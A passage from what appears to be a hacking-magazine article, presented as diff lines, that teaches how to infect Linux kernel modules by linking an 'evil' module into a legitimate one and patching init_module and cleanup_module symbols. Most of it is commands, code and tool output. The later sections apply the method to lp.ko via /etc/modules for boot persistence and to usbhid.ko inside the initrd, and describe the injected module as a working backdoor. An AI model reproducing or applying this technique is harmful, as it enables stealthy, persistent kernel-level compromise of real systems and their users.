+
+    printk(KERN_ALERT "Exit Original!");
+
+    return;
+}
+
+module_init(init);
+module_exit(clean);
+/******************************** EOF ************************************/
+
+/***************************** evil.c ************************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+int evil(void) {
+
+    printk(KERN_ALERT "Init Inject!");
+
+    return 0;
+}
+/******************************** EOF ************************************/
+
+Once the two modules orig.ko and evil.ko are compiled, they can be linked
+together using the 'ld -r' command (as explained by truff) because they are
+both relocatable objects.
+
+$ ld -r orig.ko evil.ko -o new.ko
+$ objdump -t new.ko
+
+new.ko:     file format elf32-i386
+
+SYMBOL TABLE:
+...
+
+00000040 g     F .text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000000 g     F .text	00000019 clean
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b init
+
+The evil() function has now been linked into the new.ko module. The next
+step is to make init_module() (defined in orig.ko) an alias of evil()
+(defined in evil.ko). It can be done easily using ./elfchger:
+
+$ ./elfchger -f init_module -v 00000040 new.ko
+[+] Opening new.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0x954
+[+] Finding ".strtab" section...
+	>> Found at 0x97c
+[+] Getting symbol' infos:
+	>> Symbol found at 0xbe4
+	>> Index in symbol table: 0x1d
+[+] Replacing 0x00000020 with 0x00000040... done!
+
+At this point the module can be renamed and loaded:
+
+$ mv new.ko orig.ko
+$ sudo insmod orig.ko
+$ dmesg | tail
+...
+[ 6791.920363] Init Inject!
+
+And the magic occurs :)
+
+As already explained by truff, if we want the original module to work
+properly, we need to call its initialization function. This can be done
+using an imported symbol which will be fixed at linking time.  The init()
+function is declared as extern: this means that it will be resolved at
+linking time. We use the following code:
+
+/****************************** evil.c ***********************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+extern int init();
+
+int evil(void) {
+
+    init();
+    printk(KERN_ALERT "Init Inject!");
+
+    /* do something */
+
+    return 0;
+}
+/******************************** EOF ************************************/
+
+And it works:
+
+$ dmesg | tail
+...
+[ 7910.392244] Init Original!
+[ 7910.392248] Init Inject!
+
+
+---[ 4 - Real World: Is it so simple?
+
+
+In this section it will be shown why the method described above when used
+in real life may not work. In fact the example modules were overly
+simplified for a better understanding of the basic idea of module
+infection.
+
+
+---[ 4.1 - Static functions
+
+
+The majority of Linux system modules are a little bit different from those
+used above. Here is a more accurate example:
+
+/***************************** orig.c ************************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+static int init(void) {
+
+    printk(KERN_ALERT "Init Original!");
+
+    return 0;
+}
+
+static void clean(void) {
+
+    printk(KERN_ALERT "Exit Original!");
+
+    return;
+}
+
+module_init(init);
+module_exit(clean);
+/******************************** EOF ************************************/
+
+Let's try to use our method to inject the old evil code inside this new
+orig module.
+
+$ ld -r orig.ko evil.ko -o new.ko
+$ sudo insmod new.ko
+insmod: error inserting 'new.ko': -1 Unknown symbol in module
+
+What? More information is needed:
+
+$ dmesg | tail
+...
+[ 2737.539906] orig: Unknown symbol init (err 0)
+
+The unknown symbol appears to be init. To understand the reason why init is
+"unknown" let's have a look at the symbol table of new.ko:
+
+$ objdump -t new.ko
+
+...
+
+SYMBOL TABLE:
+...
+
+00000000 l     F .text	00000019 clean
+00000020 l     F .text	0000001b init
+
+...
+
+00000040 g     F .text	00000020 evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000000         *UND*	00000000 init
+
+This output shows that there are now two "init" symbols, one of them not
+being defined (*UND*). This means that the linker does not perform
+correctly the linking between the init functions in orig.ko and evil.ko. As
+a result, when the module is loaded, the kernel tries to find the init
+symbol, but since it is not defined anywhere it fails to do so and the
+module is not loaded.
+
+
+---[ 4.1.1 - Local symbol
+
+The 'readelf' tool can give us more insight:
+
+$ readelf -s orig.ko
+
+Symbol table '.symtab' contains 26 entries:
+   Num:    Value  Size Type    Bind   Vis      Ndx Name
+    ...
+    14: 00000020    27 FUNC    LOCAL  DEFAULT    2 init
+    ...
+
+To summarize, we know about the init symbol that:
+
+- its relative address is 0x00000020;
+- its type is a function;
+- its binding is local;
+
+The symbol binding is now local (while it was previously global) since the
+init function is now declared 'static' in orig.c. This has the effect to
+reduce its scope to the file in which it is declared. For this reason the
+symbol was not properly resolved by the linker. We need to do something in
+order to change the scope of init, otherwise the injection won't work.
+
+
+---[ 4.1.2 - Changing symbol binding
+
+
+It's possible to change a symbol binding using the 'objcopy' tool. In fact
+the '--globalize-symbol' option can be used to give global scoping to the
+specified symbol:
+
+$ objcopy --globalize-symbol=init ./orig.ko orig2.ko
+
+But if for some reason, objcopy is not present, the tool that I wrote can
+also globalize a particular symbol modifying all the necessary fields
+inside the ELF file.
+
+Each symbol table entry in the .symtab section is defined as follows [2]:
+
+/******************************** EOF ************************************/
+typedef struct
+{
+  Elf32_Word	st_name;	/* Symbol name (string tbl index) */
+  Elf32_Addr	st_value;	/* Symbol value */
+  Elf32_Word	st_size;	/* Symbol size */
+  unsigned char	st_info;	/* Symbol type and binding */
+  unsigned char	st_other;	/* Symbol visibility */
+  Elf32_Section	st_shndx;	/* Section index */
+} Elf32_Sym;
+/******************************** EOF ************************************/
+
+First, it's necessary to find in the ELF file the symbol we are looking for
+(init) and check if it has a global or a local binding. The function
+ElfGetSymbolByName() searches the offset at which init symbol is located in
+the .symtab and it fills the corresponding "Elf32_Sym sym" structure.
+Next, the binding type must be checked by looking at the st_info field.
+Passing sym.st_info to the macro ELF32_ST_BIND() defined in "<elf.h>",
+returns the expected binding value.
+
+If the symbol has a local binding, these steps have to be performed:
+
+1. Reorder the symbols: the symbol we are interested in must be placed
+   among the global symbols inside the .symtab section. We'll see later why
+   this step is mandatory. We need to move the init symbol from:
+
+   $ readelf -s orig.ko
+
+   Symbol table '.symtab' contains 26 entries:
+   Num:    Value  Size Type    Bind   Vis      Ndx Name
+     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
+     1: 00000000     0 SECTION LOCAL  DEFAULT    1
+     2: 00000000     0 SECTION LOCAL  DEFAULT    2
+     3: 00000000     0 SECTION LOCAL  DEFAULT    4
+     4: 00000000     0 SECTION LOCAL  DEFAULT    5
+     5: 00000000     0 SECTION LOCAL  DEFAULT    6
+     6: 00000000     0 SECTION LOCAL  DEFAULT    8
+     7: 00000000     0 SECTION LOCAL  DEFAULT    9
+     8: 00000000     0 SECTION LOCAL  DEFAULT   10
+     9: 00000000     0 SECTION LOCAL  DEFAULT   12
+    10: 00000000     0 SECTION LOCAL  DEFAULT   13
+    11: 00000000     0 SECTION LOCAL  DEFAULT   14
+    12: 00000000     0 FILE    LOCAL  DEFAULT  ABS orig.c
+    13: 00000000    25 FUNC    LOCAL  DEFAULT    2 clean
+
+    14: 00000020    27 FUNC    LOCAL  DEFAULT    2 init       <-----
+
+    15: 00000000    12 OBJECT  LOCAL  DEFAULT    5 __mod_license6
+    16: 00000000     0 FILE    LOCAL  DEFAULT  ABS orig.mod.c
+    17: 00000020    35 OBJECT  LOCAL  DEFAULT    5 __mod_srcversion31
+    18: 00000043     9 OBJECT  LOCAL  DEFAULT    5 __module_depends
+    19: 00000000   192 OBJECT  LOCAL  DEFAULT    8 ____versions
+    20: 00000060    59 OBJECT  LOCAL  DEFAULT    5 __mod_vermagic5
+    21: 00000000   372 OBJECT  GLOBAL DEFAULT   10 __this_module
+    22: 00000000    25 FUNC    GLOBAL DEFAULT    2 cleanup_module
+    23: 00000020    27 FUNC    GLOBAL DEFAULT    2 init_module
+    24: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND mcount
+    25: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND printk
+
+   To:
+
+   Symbol table '.symtab' contains 26 entries:
+   Num:    Value  Size Type    Bind   Vis      Ndx Name
+     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
+     1: 00000000     0 SECTION LOCAL  DEFAULT    1
+     2: 00000000     0 SECTION LOCAL  DEFAULT    2
+     3: 00000000     0 SECTION LOCAL  DEFAULT    4
+     4: 00000000     0 SECTION LOCAL  DEFAULT    5
+     5: 00000000     0 SECTION LOCAL  DEFAULT    6
+     6: 00000000     0 SECTION LOCAL  DEFAULT    8
+     7: 00000000     0 SECTION LOCAL  DEFAULT    9
+     8: 00000000     0 SECTION LOCAL  DEFAULT   10
+     9: 00000000     0 SECTION LOCAL  DEFAULT   12
+    10: 00000000     0 SECTION LOCAL  DEFAULT   13
+    11: 00000000     0 SECTION LOCAL  DEFAULT   14
+    12: 00000000     0 FILE    LOCAL  DEFAULT  ABS orig.c
+    13: 00000000    25 FUNC    LOCAL  DEFAULT    2 clean
+    14: 00000000    12 OBJECT  LOCAL  DEFAULT    5 __mod_license6
+    15: 00000000     0 FILE    LOCAL  DEFAULT  ABS orig.mod.c
+    16: 00000020    35 OBJECT  LOCAL  DEFAULT    5 __mod_srcversion31
+    17: 00000043     9 OBJECT  LOCAL  DEFAULT    5 __module_depends
+    18: 00000000   192 OBJECT  LOCAL  DEFAULT    8 ____versions
+    19: 00000060    59 OBJECT  LOCAL  DEFAULT    5 __mod_vermagic5
+
+    20: 00000020    27 FUNC    GLOBAL DEFAULT    2 init       <-----
+
+    21: 00000000   372 OBJECT  GLOBAL DEFAULT   10 __this_module
+    22: 00000000    25 FUNC    GLOBAL DEFAULT    2 cleanup_module
+    23: 00000020    27 FUNC    GLOBAL DEFAULT    2 init_module
+    24: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND mcount
+    25: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND printk
+
+   This task is accomplished by the "ReorderSymbols()" function.
+
+2. Updating the information about the init symbol (i.e. its offset, index,
+   etc..) according to its new position inside the .symtab section.
+
+3. Changing the symbol binding from local to global by modifying the
+   st_info field using the ELF32_ST_INFO macro:
+
+   #define ELF32_ST_INFO(b, t)	(((b)<<4)+((t)&0xf))
+
+   Where 'b' is the symbol binding and 't' the symbol type.
+   The binding values are:
+
+   Name        Value
+   ====        =====
+   STB_LOCAL       0
+   STB_GLOBAL      1
+   STB_WEAK        2
+   STB_LOPROC     13
+   STB_HIPROC     15
+
+   Obviously, STB_GLOBAL has to be used for our purpose.
+
+   The type values are:
+
+   Name         Value
+   ====         =====
+   STT_NOTYPE       0
+   STT_OBJECT       1
+   STT_FUNC         2
+   STT_SECTION      3
+   STT_FILE         4
+   STT_LOPROC      13
+   STT_HIPROC      15
+
+   The STT_FUNC is the type value to specify functions.
+
+   So, the resulting macro will be:
+
+   ELF32_ST_INFO(STB_GLOBAL, STT_FUNC);
+
+   The init st_info field should then be set equal to the macro's result.
+
+4. Updating the symtab section header, defined as:
+
+   typedef struct {
+      Elf32_Word	sh_name;
+      Elf32_Word	sh_type;
+      Elf32_Word	sh_flags;
+      Elf32_Addr	sh_addr;
+      Elf32_Off		sh_offset;
+      Elf32_Word	sh_size;
+      Elf32_Word	sh_link;
+      Elf32_Word	sh_info;
+      Elf32_Word	sh_addralign;
+      Elf32_Word	sh_entsize;
+   } Elf32_Shdr;
+
+   The header can be output by the 'readelf -e' command:
+
+   $ readelf -e orig.ko
+
+   ELF Header:
+
+   ...
+
+   Section Headers:
+   [Nr] Name          Type     Addr     Off    Size   ES Flg Lk Inf Al
+   ...
+   [15] .shstrtab     STRTAB   00000000 00040c 0000ae 00      0   0  1
+   [16] .symtab       SYMTAB   00000000 0007dc 0001a0 10     17  21  4
+   [17] .strtab       STRTAB   00000000 00097c 0000a5 00      0   0  1
+
+   The value of the information (sh_info) field (reported as 'Inf')
+   depends on the section header type (sh_type):
+
+   sh_type      sh_link                        sh_info
+   =======      =======                        =======
+   SHT_DYNAMIC  The section header index of    0
+                the string table used by
+                entries in the section.
+   SHT_HASH     The section header index of    0
+                the symbol table to which the
+                hash table applies.
+   SHT_REL,     The section header index of    The section header index of
+   SHT_RELA     the associated symbol table.   the section to which the
+                                               relocation applies.
+   SHT_SYMTAB,  The section header index of    One greater than the symbol
+   SHT_DYNSYM   the associated string table.   table index of the last
+                                               local symbol (binding
+                                               STB_LOCAL).
+   other        SHN_UNDEF                      0
+
+   The sh_info must be updated according to the rules of the SHT_SYMTAB
+   type. In our example, its value will be 20 = 19 + 1 (remember that our
+   symbol will be placed after the "__mod_vermagic5" symbol, whose entry
+   number is 19). This is the reason why reorder the symbol list (step 1)
+   is a necessary step.
+
+All these tasks are accomplished by the tool I wrote by using this option:
+
+./elfchger -g [symbol] <module_name>
+
+Where [symbol] is the symbol name which binding value has to be modified.
+
+
+---[ 4.1.3 Try again
+
+
+At this point we can try another test, in which the developed tool will be
+used. The two modules (orig.c and evil.c) and the Makefile remain the same.
+
+The first step is to change the init binding from 'local' to 'global'. The
+outcome of the elfchger script can be checked by looking at the readelf's
+output before and after its use. Before running the script readelf outputs:
+
+$ readelf -a orig.ko
+
+...
+
+Section Headers:
+  [Nr] Name        Type     Addr     Off    Size   ES Flg Lk Inf Al
+  ...
+  [16] .symtab     SYMTAB   00000000 0007dc 0001a0 10     17  21  4
+
+...
+
+Symbol table '.symtab' contains 26 entries:
+   Num:    Value  Size Type    Bind   Vis      Ndx Name
+    ...
+    10: 00000000     0 SECTION LOCAL  DEFAULT   13
+    11: 00000000     0 SECTION LOCAL  DEFAULT   14
+    12: 00000000     0 FILE    LOCAL  DEFAULT  ABS orig.c
+    13: 00000000    25 FUNC    LOCAL  DEFAULT    2 clean
+    14: 00000020    27 FUNC    LOCAL  DEFAULT    2 init
+    ...
+    21: 00000000   372 OBJECT  GLOBAL DEFAULT   10 __this_module
+    22: 00000000    25 FUNC    GLOBAL DEFAULT    2 cleanup_module
+    ...
+
+Let's run the script on the orig.ko file:
+
+$ ./elfchger -g init orig.ko
+[+] Opening orig.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0x73c
+[+] Finding ".strtab" section...
+	>> Found at 0x764
+[+] Getting symbol' infos:
+	>> Symbol found at 0x8bc
+	>> Index in symbol table: 0xe
+[+] Reordering symbols:
+	>> Starting:
+	>> Moving symbol from f to e
+	>> Moving symbol from 10 to f
+	>> Moving symbol from 11 to 10
+	>> Moving symbol from 12 to 11
+	>> Moving symbol from 13 to 12
+	>> Moving symbol from 14 to 13
+	>> Moving our symbol from 14 to 14
+	>> Last LOCAL symbol: 0x14
+	>> Done!
+[+] Updating symbol' infos:
+	>> Symbol found at 0x91c
+	>> Index in symbol table: 0x14
+	>> Replacing flag 'LOCAL' located at 0x928 with 'GLOBAL'
+[+] Updating symtab infos at 0x73c
+
+Let's see what happened:
+
+$ readelf -a orig.ko
+
+...
+
+Section Headers:
+  [Nr] Name       Type            Addr     Off    Size   ES Flg Lk Inf Al
+  ...
+  [16] .symtab    SYMTAB          00000000 0007dc 0001a0 10     17  20  4
+  [17] .strtab    STRTAB          00000000 00097c 0000a5 00      0   0  1
+
+...
+
+Symbol table '.symtab' contains 26 entries:
+   Num:    Value  Size Type    Bind   Vis      Ndx Name
+    ...
+    18: 00000000   192 OBJECT  LOCAL  DEFAULT    8 ____versions
+    19: 00000060    59 OBJECT  LOCAL  DEFAULT    5 __mod_vermagic5
+    20: 00000020    27 FUNC    GLOBAL DEFAULT    2 init
+    21: 00000000   372 OBJECT  GLOBAL DEFAULT   10 __this_module
+    ...
+
+So as expected:
+
+- the position of init is changed from 14 to 20 in the symbol table;
+- the 'Inf' field in the .symtab header has changed: its current value is
+  20 (19 (last index local symbol) + 1);
+- the binding of init has changed from local to global.
+
+Now we can link together orig.ko and evil.ko:
+
+$ ld -r orig.ko evil.ko -o new.ko
+$ objdump -t new.ko
+
+...
+
+00000040 g     F .text	00000020 evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000020 g     F .text	0000001b init_module
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000020 g     F .text	0000001b init
+
+We can notice that the init symbol is no more *UND*. The final step is to
+modify the value of init_module:
+
+$ ./elfchger -s init_module -v 00000040 new.ko
+[+] Opening new.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0x954
+[+] Finding ".strtab" section...
+	>> Found at 0x97c
+[+] Getting symbol' infos:
+	>> Symbol found at 0xbfc
+	>> Index in symbol table: 0x1e
+[+] Replacing 0x00000020 with 0x00000040... done!
+
+Let's try to load module:
+
+$ mv new.ko orig.ko
+$ sudo insmod orig.ko
+$ dmesg|tail
+...
+[ 2385.342838] Init Original!
+[ 2385.342845] Init Inject!
+
+Cool!! It works!
+
+
+---[ 4.2 Static __init init functions
+
+
+In the previous section it was demonstrated how to inject modules when the
+init function is declared as static. However in some cases the startup
+function in the kernel modules is defined with the __init macro:
+
+static int __init function_name();
+
+The __init macro is used to describe the function as only being required
+during initialisation time. Once initialisation has been performed, the
+kernel will remove this function and release the corresponding memory.
+
+The __init macro is defined in "include/linux/init.h":
+
+/*************************************************************************/
+#define __init               __section(.init.text) __cold notrace
+/*************************************************************************/
+
+The __section macro is defined in "include/linux/compiler.h":
+
+/*************************************************************************/
+#define __section(S)         __attribute__ ((__section__(#S)))
+/*************************************************************************/
+
+While __cold macro is defined in "/include/linux/compiler-gcc*.h":
+
+/*************************************************************************/
+#define __cold               __attribute__((__cold__))
+/*************************************************************************/
+
+When the __init macro is used, a number of GCC attributes are added to the
+function declaration. The __cold attribute informs the compiler to optimize
+it for size instead of speed, because it'll be rarely used. The __section
+attribute informs the compiler to put the text for this function in a new
+section named ".init.text" [5]. How these __init functions are called can
+be checked in "kernel/module.c":
+
+/*************************************************************************/
+static void __init do_initcalls(void)
+{
+     initcall_t *fn;
+
+     for (fn = __early_initcall_end; fn < __initcall_end; fn++)
+          do_one_initcall(*fn);
+
+     /* Make sure there is no pending stuff from the initcall sequence */
+     flush_scheduled_work();
+}
+
+/*************************************************************************/
+
+For each step of the loop inside the do_initcalls() function, an __init
+function set up by the module_init macro is executed. The injection will
+work even if the function is declared with __init.
+
+The module orig is as follows:
+
+/******************************** orig.c *********************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+static int __init init(void) {
+
+    printk(KERN_ALERT "Init Original!");
+
+    return 0;
+}
+
+static void clean(void) {
+
+    printk(KERN_ALERT "Exit Original!");
+
+    return;
+}
+
+module_init(init);
+module_exit(clean);
+/******************************** EOF ************************************/
+
+After the compilation and as expected, a new .init.text section has
+appeared:
+
+$ objdump -t orig.ko
+...
+00000000 l     F .init.text	00000016 init
+00000000 l     O .modinfo	0000000c __mod_license6
+00000000 l    df *ABS*	00000000 orig.mod.c
+00000020 l     O .modinfo	00000023 __mod_srcversion31
+00000043 l     O .modinfo	00000009 __module_depends
+00000000 l     O __versions	000000c0 ____versions
+00000060 l     O .modinfo	0000003b __mod_vermagic5
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000000 g     F .init.text	00000016 init_module
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+
+Both init and init_module symbols are part of the .init.text section. This
+new issue can be solved by defining the evil() function as __init:
+
+/******************************** evil.c *********************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+extern int __init init();
+
+int __init evil(void) {
+
+    init();
+    printk(KERN_ALERT "Init Inject!");
+
+    /* does something */
+
+    return 0;
+}
+/******************************** EOF ************************************/
+
+Both init() and evil() are prefixed with  __init because we need them in
+the same section. The same steps described in section 4.1.3 are then
+performed:
+
+1 - Change the init binding:
+
+$ ./elfchger -g init orig.ko
+[+] Opening orig.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0x77c
+[+] Finding ".strtab" section...
+	>> Found at 0x7a4
+[+] Getting symbol' infos:
+	>> Symbol found at 0x8fc
+	>> Index in symbol table: 0xf
+[+] Reordering symbols:
+	>> Starting:
+	>> Moving symbol from 10 to f
+	>> Moving symbol from 11 to 10
+	>> Moving symbol from 12 to 11
+	>> Moving symbol from 13 to 12
+	>> Moving symbol from 14 to 13
+	>> Moving symbol from 15 to 14
+	>> Moving our symbol from 15 to 15
+	>> Last LOCAL symbol: 0x15
+	>> Done!
+[+] Updating symbol' infos:
+	[>> Symbol found at 0x95c
+	>> Index in symbol table: 0x15
+	>> Replacing flag 'LOCAL' located at 0x968 with 'GLOBAL'
+[+] Updating symtab infos at 0x77c
+
+
+2 - Link the modules together:
+
+$ ld -r orig.ko evil.ko -o new.ko
+$ objdump -t new.ko
+
+...
+
+00000016 g     F .init.text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000000 g     F .init.text	00000016 init_module
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000000 g     F .init.text	00000016 init
+
+
+3 - Change init_module address:
+
+$ ./elfchger -s init_module -v 00000016 new.ko
+[+] Opening new.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0x954
+[+] Finding ".strtab" section...
+	>> Found at 0x97c
+[+] Getting symbol' infos:
+	>> Symbol found at 0xbec
+	>> Index in symbol table: 0x1f
+[+] Replacing 0x00000000 with 0x00000016... done!
+
+$ objdump -t new.ko
+
+...
+
+00000016 g     F .init.text	0000001b evil
+00000000 g     O .gnu.linkonce.this_module	00000174 __this_module
+00000000 g     F .text	00000019 cleanup_module
+00000016 g     F .init.text	00000016 init_module
+00000000         *UND*	00000000 mcount
+00000000         *UND*	00000000 printk
+00000000 g     F .init.text	00000016 init
+
+
+4 - Load the module in memory:
+
+$ mv new.ko orig.ko
+$ sudo insmod orig.ko
+$ dmesg|tail
+...
+[  323.085545] Init Original!
+[  323.085553] Init Inject!
+
+As expected, it works!
+
+
+---[ 4.3 - What about cleanup_module
+
+
+These methods work fine with the cleanup_module symbol which is called by
+the kernel when the module is unloaded. Never forget to deal with the
+termination function as well because if you don't and if the infected
+module was removed for some reason then your kernel would most likely crash
+(because there would now be invalid references to the module).
+
+The module exit function can be injected simply by altering the symbol
+whose name is specified in elfchger:
+
+$ ./elfchger -s cleanup_module -v address_evil_fn new.ko
+
+In this way, when the module is unloaded, the evil() function will be
+invoked instead of the clean() one. You may also need to deal with binding
+issues and __exit attribute but the adaptation of the previous method is
+straightforward.
+
+
+---[ 5 - Real life example
+
+
+This chapter will show the usage of the present method in a real life
+example. Let's suppose that evil.ko is a working backdoor. We want to
+inject it into a kernel module not used by any other kernel module. This
+test was done on Ubuntu 11.10 (x86) with a 3.0.0 kernel.
+
+$ uname -a
+Linux ubuntu 3.0.0-15-generic #26-Ubuntu SMP Fri Jan 20 15:59:53 UTC 2012
+i686 i686 i386 GNU/Linux
+
+Let's begin by checking which modules to infect by using the lsmod command:
+
+$ lsmod
+
+Module                  Size  Used by
+serio_raw               4022  0
+lp                      7342  0
+snd_seq_midi            4588  0
+usbhid                 36882  0
+binfmt_misc             6599  1
+agpgart                32011  1 drm
+snd_intel8x0           25632  2
+
+...
+
+libahci                21667  3 ahci
+
+The command output shows that some of the modules are not used by any
+other module. These modules can be unloaded safely and then they can be
+infected with our backdoor using the method presented above. This chapter
+is divided into two sections in which I'll describe two techniques to load
+the module when the operating system is booted:
+
+1 - Infect a kernel module (or simply add a new one) on
+    /etc/modprobe.preload (Fedora, etc.) or in /etc/modules on
+    Debian/Ubuntu.
+
+2 - Backdoor initrd.
+
+
+---[ 5.1 - Infecting a kernel module in /etc/modules
+
+First of all, we have to know which modules are in the /etc/modules file:
+
+$ cat /etc/modules
+# /etc/modules: kernel modules to load at boot time.
+...
+lp
+
+As described in the previous section, this module (lp.ko) can be unloaded
+safely and then infected with our backdoor.
+
+$ find / -name lp.ko
+...
+/lib/modules/3.0.0-15-generic/kernel/drivers/char/lp.ko
+...
+
+$ cd /lib/modules/3.0.0-15-generic/kernel/drivers/char
+
+Next, we check which function is called by the init_module:
+
+$ objdump -t lp.ko |grep -e ".init.text"
+00000000 l     F .init.text 00000175 lp_init
+00000175 l     F .init.text 000000ae lp_init_module
+00000000 l    d  .init.text 00000000 .init.text
+00000175 g     F .init.text 000000ae init_module
+
+We want to infect the lp_init_module() function, so the evil module will
+be coded in the following way:
+
+/****************** evil.c ***********************************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+extern int __init lp_init_module();
+
+int __init evil(void) {
+
+    printk(KERN_ALERT "Init Inject! Lp");
+    lp_init_module();
+
+    /* does something */
+
+    return 0;
+}
+/****************** EOF **************************************************/
+
+Since the lp_init_module function is static we need to change its binding
+type to global.
+
+$ ./elfchger -g lp_init_module lp.ko
+[+] Opening lp.ko file...
+[+] Reading Elf header...
+    >> Done!
+[+] Finding ".symtab" section...
+    >> Found at 0x28a0
+[+] Finding ".strtab" section...
+    >> Found at 0x28c8
+[+] Getting symbol' infos:
+    >> Symbol found at 0x2b30
+    >> Index in symbol table: 0x24
+[+] Reordering symbols:
+    >> Starting:
+    >> Moving symbol from 25 to 24
+    >> Moving symbol from 26 to 25
+    >> Moving symbol from 27 to 26
+    >> Moving symbol from 28 to 27
+    >> Moving symbol from 29 to 28
+    >> Moving symbol from 2a to 29
+    >> Moving symbol from 2b to 2a
+    >> Moving symbol from 2c to 2b
+    >> Moving symbol from 2d to 2c
+    >> Moving symbol from 2e to 2d
+    >> Moving symbol from 2f to 2e
+    >> Moving symbol from 30 to 2f
+    >> Moving symbol from 31 to 30
+    >> Moving symbol from 32 to 31
+    >> Moving symbol from 33 to 32
+    >> Moving symbol from 34 to 33
+    >> Moving symbol from 35 to 34
+    >> Moving symbol from 36 to 35
+    >> Moving symbol from 37 to 36
+    >> Moving symbol from 38 to 37
+    >> Moving symbol from 39 to 38
+    >> Moving symbol from 3a to 39
+    >> Moving symbol from 3b to 3a
+    >> Moving symbol from 3c to 3b
+    >> Moving symbol from 3d to 3c
+    >> Moving our symbol from 36 to 3d
+    >> Last LOCAL symbol: 0x3d
+    >> Done!
+[+] Updating symbol' infos:
+    >> Symbol found at 0x2cc0
+    >> Index in symbol table: 0x3d
+    >> Replacing flag 'LOCAL' located at 0x2ccc with 'GLOBAL'
+[+] Updating symtab infos at 0x28a0
+
+The two modules can be now linked together:
+
+$ ld -r lp.ko evil.ko -o new.ko
+$ objdump -t new.ko |grep -e init_module -e evil
+00000000 l    df *ABS*  00000000 evil.c
+00000000 l    df *ABS*  00000000 evil.mod.c
+00000223 g     F .init.text 00000019 evil
+00000175 g     F .init.text 000000ae lp_init_module
+00000175 g     F .init.text 000000ae init_module
+
+Now the relative address of init_module has to be changed to 0000021a:
+
+$ ./elfchger -s init_module -v 00000223 new.ko
+[+] Opening new.ko file...
+[+] Reading Elf header...
+    >> Done!
+[+] Finding ".symtab" section...
+    >> Found at 0x2a34
+[+] Finding ".strtab" section...
+    >> Found at 0x2a5c
+[+] Getting symbol' infos:
+    >> Symbol found at 0x39a4
+    >> Index in symbol table: 0x52
+[+] Replacing 0x00000175 with 0x00000223... done!
+
+The new.ko module must be renamed to lp.ko and then loaded:
+
+$ mv new.ko lp.ko
+$ sudo rmmod lp
+$ sudo insmod lp.ko
+$ dmesg|tail
+...
+$ dmesg
+....
+[ 1033.418723] Init Inject! Lp
+[ 1033.431131] lp0: using parport0 (interrupt-driven).
+
+From now on, every time the system is booted, the infected lp kernel
+module will be loaded instead of the original one.
+
+
+---[ 5.2 - Backdooring initrd
+
+It is also possible to backdoor a module in the initrd image. The target
+module has to be extracted out of the image, backdoored and then reinserted
+back. The target module used throughout this example will be usbhid.ko.
+
+In order to inject a kernel module into the initrd image, we'll follow the
+guide in [9], which explains how to add a new module inside the initrd
+image. According to [9], the initrd image can be copied from /boot to a
+target directory (e.g. /tmp) so we can easily work on it:
+
+$ cp /boot/initrd.img-2.6.35-22-generic /tmp/
+$ cd /tmp
+
+The image can be now decompressed using the gzip tool:
+
+$ mv initrd.img-2.6.35-22-generic initrd.img-2.6.35-22-generic.gz
+$ gzip -d initrd.img-2.6.35-22-generic.gz
+$ mkdir initrd
+$ cd initrd/
+$ cpio -i -d -H newc -F ../initrd.img-2.6.35-22-generic \
+--no-absolute-filenames
+50522 blocks
+
+The location of the usbhid.ko module has then to be found inside the kernel
+tree:
+
+$ find ./ -name usbhid
+./lib/modules/2.6.35-22-generic/kernel/drivers/hid/usbhid
+$ cd lib/modules/2.6.35-22-generic/kernel/drivers/hid/usbhid
+
+At this point it can be easily infected with our evil module:
+
+$ objdump -t usbhid.ko |grep -e ".init.text"
+00000000 l     F .init.text	000000c3 hid_init
+00000000 l    d  .init.text	00000000 .init.text
+00000000 g     F .init.text	000000c3 init_module
+000000c3 g     F .init.text	00000019 hiddev_init
+
+Since we want to infect the hid_init() function, the evil module will be
+coded in the following way:
+
+/****************** evil.c ***********************************************/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/errno.h>
+
+MODULE_LICENSE("GPL");
+
+extern int __init hid_init();
+
+int __init evil(void) {
+
+    hid_init();
